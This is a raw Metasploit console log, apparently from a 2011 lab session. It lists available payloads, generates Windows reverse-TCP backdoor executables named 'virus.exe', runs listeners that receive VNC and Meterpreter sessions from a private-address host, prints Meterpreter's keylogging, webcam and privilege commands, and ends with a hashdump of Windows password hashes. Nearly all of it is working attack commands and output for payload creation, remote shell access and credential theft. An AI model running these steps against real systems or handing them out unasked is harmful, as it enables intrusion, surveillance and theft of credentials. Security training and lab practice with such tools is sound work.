=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12644 updated today (2011.05.17)
msf > show payloads
Payloads
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve shell for inetd
aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
bsd/sparc/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
bsd/sparc/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
bsd/x86/exec normal BSD Execute Command
bsd/x86/metsvc_bind_tcp normal FreeBSD Meterpreter Service, Bind TCP
bsd/x86/metsvc_reverse_tcp normal FreeBSD Meterpreter Service, Reverse TCP Inline
bsd/x86/shell/bind_tcp normal BSD Command Shell, Bind TCP Stager
bsd/x86/shell/find_tag normal BSD Command Shell, Find Tag Stager
bsd/x86/shell/reverse_tcp normal BSD Command Shell, Reverse TCP Stager
bsd/x86/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
bsd/x86/shell_find_port normal BSD Command Shell, Find Port Inline
bsd/x86/shell_find_tag normal BSD Command Shell, Find Tag Inline
bsd/x86/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
bsdi/x86/shell/bind_tcp normal BSDi Command Shell, Bind TCP Stager
bsdi/x86/shell/reverse_tcp normal BSDi Command Shell, Reverse TCP Stager
bsdi/x86/shell_bind_tcp normal BSDi Command Shell, Bind TCP Inline
bsdi/x86/shell_find_port normal BSDi Command Shell, Find Port Inline
bsdi/x86/shell_reverse_tcp normal BSDi Command Shell, Reverse TCP Inline
cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/interact normal Unix Command, Interact with established connection
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_bash normal Unix Command Shell, Reverse TCP (/dev/tcp)
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/windows/adduser normal Windows Execute net user /ADD CMD
cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via perl)
cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby)
cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs)
cmd/windows/reverse_perl normal Windows Command, Double reverse TCP connection (via perl)
cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline
java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP stager
linux/armle/adduser normal Linux Add User
linux/armle/exec normal Linux Execute Command
linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/ppc/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/ppc/shell_find_port normal Linux Command Shell, Find Port Inline
linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/ppc64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/ppc64/shell_find_port normal Linux Command Shell, Find Port Inline
linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/find_tag normal Linux Meterpreter, Find Tag Stager
linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/find_tag normal Linux Command Shell, Find Tag Stager
linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/x86/shell_find_port normal Linux Command Shell, Find Port Inline
linux/x86/shell_find_tag normal Linux Command Shell, Find Tag Inline
linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm demo
netware/shell/reverse_tcp normal NetWare Command Shell, Reverse TCP Stager
osx/armle/execute/bind_tcp normal OSX Write and Execute Binary, Bind TCP Stager
osx/armle/execute/reverse_tcp normal OSX Write and Execute Binary, Reverse TCP Stager
osx/armle/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
osx/armle/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
osx/armle/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
osx/armle/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
osx/armle/vibrate normal OSX iPhone Vibrate
osx/ppc/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
osx/ppc/shell/find_tag normal OSX Command Shell, Find Tag Stager
osx/ppc/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
osx/ppc/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
osx/ppc/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
osx/x86/bundleinject/bind_tcp normal Mac OS X Inject Mach-O Bundle, Bind TCP Stager
osx/x86/bundleinject/reverse_tcp normal Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
osx/x86/exec normal OSX Execute Command
osx/x86/isight/bind_tcp normal Mac OS X x86 iSight photo capture, Bind TCP Stager
osx/x86/isight/reverse_tcp normal Mac OS X x86 iSight photo capture, Reverse TCP Stager
osx/x86/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
osx/x86/shell_find_port normal OSX Command Shell, Find Port Inline
osx/x86/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
osx/x86/vforkshell/bind_tcp normal OSX (vfork) Command Shell, Bind TCP Stager
osx/x86/vforkshell/reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Stager
osx/x86/vforkshell_bind_tcp normal OSX (vfork) Command Shell, Bind TCP Inline
osx/x86/vforkshell_reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
php/bind_php normal PHP Command Shell, Bind TCP (via php)
php/download_exec normal PHP Executable Download and Execute
php/exec normal PHP Execute Command
php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
php/shell_findsock normal PHP Command Shell, Find Sock
solaris/sparc/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
solaris/sparc/shell_find_port normal Solaris Command Shell, Find Port Inline
solaris/sparc/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
solaris/x86/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
solaris/x86/shell_find_port normal Solaris Command Shell, Find Port Inline
solaris/x86/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
tty/unix/interact normal Unix TTY, Interact with established connection
windows/adduser normal Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/find_tag normal Reflective Dll Injection, Find Tag Ordinal Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt injection), Find Tag Ordinal Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager
windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say You Got Pwned!
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager
windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
windows/x64/exec normal Windows x64 Execute Command
windows/x64/meterpreter/bind_tcp normal Windows x64 Meterpreter, Windows x64 Bind TCP Stager
windows/x64/meterpreter/reverse_tcp normal Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager
windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager
windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline
windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
msf > use windows/vncinject/reverse_tcp
msf payload(reverse_tcp) > show options
Module options (payload/windows/vncinject/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E Force encoding.
-b <opt> The list of characters to avoid: '\x00\xff'
-e <opt> The name of the encoder module to use.
-f <opt> The output file name (otherwise stdout)
-h Help banner.
-i <opt> the number of encoding iterations.
-k Keep the template executable functional
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The Platform for output.
-s <opt> NOP sled length.
-t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-x <opt> The executable template to use
msf payload(reverse_tcp) > generate -f virus.exe -t exe
[*] Writing 73802 bytes to virus.exe...
msf payload(reverse_tcp) > ls -al virus.exe
[*] exec: ls -al virus.exe
-rwx------+ 1 ByJJoon None 73802 May 18 06:38 virus.exe
msf payload(reverse_tcp) > file virus.exe
[*] exec: file virus.exe
virus.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/vncinject/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (445440 bytes) to 192.168.109.128
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(handler) >
msf exploit(handler) > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
Module options (payload/windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
msf payload(reverse_tcp) > set LHOST 192.168.109.1
LHOST => 192.168.109.1
msf payload(reverse_tcp) > generate -f virus2.exe -t exe
[*] Writing 73802 bytes to virus2.exe...
msf payload(reverse_tcp) > ls -al virus2.exe
[*] exec: ls -al virus2.exe
-rwx------+ 1 ByJJoon None 73802 May 18 06:50 virus2.exe
msf payload(reverse_tcp) > file virus2.exe
[*] exec: file virus2.exe
virus2.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.109.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.109.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.109.128
[*] Meterpreter session 2 opened (192.168.109.1:4444 -> 192.168.109.128:1074) at 2011-05-18 06:51:23 +0900
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > hashdump
Administrator:500:6c36913468365950aad3b435b51404ee:711161255cd9560e884378d0e28a5027:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a51f93e4803b68166e1cee91c7744d1f:7d28b6b112e8f84513b8d1e3aa40d1a7:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:35db8a26c8621e45b0ef24a043665a23:::
Test:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >